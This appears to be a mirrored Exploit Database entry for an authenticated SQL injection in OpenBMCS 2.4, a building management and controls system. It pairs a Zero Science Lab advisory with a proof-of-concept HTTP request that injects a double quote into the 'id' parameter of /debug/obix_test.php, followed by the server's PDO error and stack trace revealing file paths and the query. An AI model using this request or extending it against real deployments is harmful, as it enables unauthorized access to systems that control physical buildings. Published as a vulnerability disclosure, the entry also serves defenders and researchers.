OpenBMCS 2.4 – SQLi (Authenticated)

• Exploit Database
• 17 阅读

• 作者： LiquidWorm
  日期： 2022-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50668/

• # Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated)
  # Exploit Author: LiquidWorm
  # Date: 26/10/2021
  
  OpenBMCS 2.4 Authenticated SQL Injection
  
  
  Vendor: OPEN BMCS
  Product web page: https://www.openbmcs.com
  Affected version: 2.4
  
  Summary: Building Management & Controls System (BMCS). No matter what the
  size of your business, the OpenBMCS software has the ability to expand to
  hundreds of controllers. Our product can control and monitor anything from
  a garage door to a complete campus wide network, with everything you need
  on board.
  
  Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via
  the 'id' GET parameter is not properly sanitised before being returned to the
  user or used in SQL queries. This can be exploited to manipulate SQL queries
  by injecting arbitrary SQL code.
  
  Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
   Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
   Apache/2.4.41 (Ubuntu)
   Apache/2.4.25 (Debian)
   nginx/1.16.1
   PHP/7.4.3
   PHP/7.0.33-0+deb9u9
  
  
  Vulnerability discovered by Semen 'samincube' Rozhkov
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5692
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php
  
  
  26.10.2021
  
  --
  
  
  The following PoC request demonstrates the issue (authenticated user session is required):
  
  GET /debug/obix_test.php?id=1%22 HTTP/1.1
  Host: 192.168.1.222
  Cookie: PHPSESSID=ssid123ssid123ssid1234ssid
  Connection: close
  
  
  Response:
  
  HTTP/1.1 200 OK
  Date: Sat, 1 Jan 2022 15:09:54 GMT
  Server: Apache/2.4.10 (Debian)
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Vary: Accept-Encoding
  Content-Length: 629
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  <br />
  <b>Fatal error</b>:Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146
  Stack trace:
  #0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...')
  #1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true)
  #2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config')
  #3 {main}
  thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />